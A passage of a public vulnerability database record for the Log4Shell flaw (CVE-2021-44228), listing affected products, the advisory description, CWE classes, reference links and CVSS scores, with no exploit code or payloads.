"cpe:2.3:a:cisco:ucs_central_software:2.0\\(1b\\):*:*:*:*:*:*:*", 
"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1a\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:6.0\\(2.1912\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(3\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(4.018\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(3.025\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(2.26\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(1.26\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\(1\\):sr7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unity_connection:11.5\\(1.10000.6\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.3\\(0\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(0\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.4\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.002\\(000.116\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.001\\(000.518\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.000\\(000.458\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.007\\(000.356\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.006\\(000.156\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.004\\(000.914\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\(2.1914\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:cloudcenter_suite:4.10\\(0.15\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, 
{ "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.010\\(000.000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.002\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.001\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.002\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.001\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:snowsoftware:vm_access_proxy:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:snowsoftware:snow_commander:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.10.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": 
"cpe:2.3:a:bentley:synchro_4d:*:*:*:*:pro:*:*:*", "cpe_name": [], "versionEndExcluding": "6.2.4.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:bentley:synchro:*:*:*:*:pro:*:*:*", "cpe_name": [], "versionEndExcluding": "6.4.3.2", "versionStartIncluding": "6.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:percussion:rhythmyx:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "7.3.2", "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "security@apache.org", "ID": "CVE-2021-44228" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects." 
} ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-20" }, { "lang": "en", "value": "CWE-400" }, { "lang": "en", "value": "CWE-502" } ] } ] }, "references": { "reference_data": [ { "name": "https://logging.apache.org/log4j/2.x/security.html", "refsource": "MISC", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "refsource": "MLIST", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "refsource": "MLIST", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2" }, { "name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "name": "https://security.netapp.com/advisory/ntap-20211210-0007/", "refsource": "CONFIRM", "tags": [ "Vendor Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "refsource": "CISCO", "tags": [ "Third Party Advisory" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "refsource": "MLIST", "tags": [ 
"Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3" }, { "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "name": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "name": "FEDORA-2021-f0f501d01f", "refsource": "FEDORA", "tags": [ "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/" }, { "name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1" }, { "name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2" }, { "name": "https://twitter.com/kurtseifried/status/1469345530182455296", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://twitter.com/kurtseifried/status/1469345530182455296" }, { "name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "name": "DSA-5020", "refsource": "DEBIAN", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-5020" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf", "refsource": 
"CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "name": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "name": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html" }, { "name": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html" }, { "name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html" }, { "name": "VU#930724", "refsource": "CERT-VN", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "https://www.kb.cert.org/vuls/id/930724" }, { "name": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html" }, { "name": 
"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html" }, { "name": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html" }, { "name": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html" }, { "name": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html" }, { "name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "refsource": "MS", "tags": [ "Patch", "Third Party Advisory", "Vendor Advisory" ], "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" }, { "name": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", "refsource": "MISC", "tags": [ "Third Party Advisory" ], "url": 
"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf" }, { "name": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf" }, { "name": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html" }, { "name": "FEDORA-2021-66d6c484f3", "refsource": "FEDORA", "tags": [ "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/" }, { "name": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md", "refsource": "MISC", "tags": [ "Product", "US Government Resource" ], "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md" }, { "name": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html" }, { "name": 
"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html" }, { "name": "https://www.oracle.com/security-alerts/cpujan2022.html", "refsource": "MISC", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "name": "https://github.com/cisagov/log4j-affected-db", "refsource": "MISC", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cisagov/log4j-affected-db" }, { "name": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001", "refsource": "MISC", "tags": [ "Third Party Advisory" ], "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001" }, { "name": "https://support.apple.com/kb/HT213189", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213189" }, { "name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3", "refsource": "FULLDISC", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Mar/23" }, { "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228" }, { "name": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html" }, { "name": "20220721 Open-Xchange Security Advisory 2022-07-21", "refsource": 
"FULLDISC", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/11" }, { "name": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html" }, { "name": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html" }, { "name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation", "refsource": "FULLDISC", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Dec/2" }, { "name": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 6.0 } }, "lastModifiedDate": "2023-04-03T20:15Z", "publishedDate": "2021-12-10T10:15Z" } } }
Sightings
Author | Source | Type | Date |
---|---|---|---|
Nomenclature
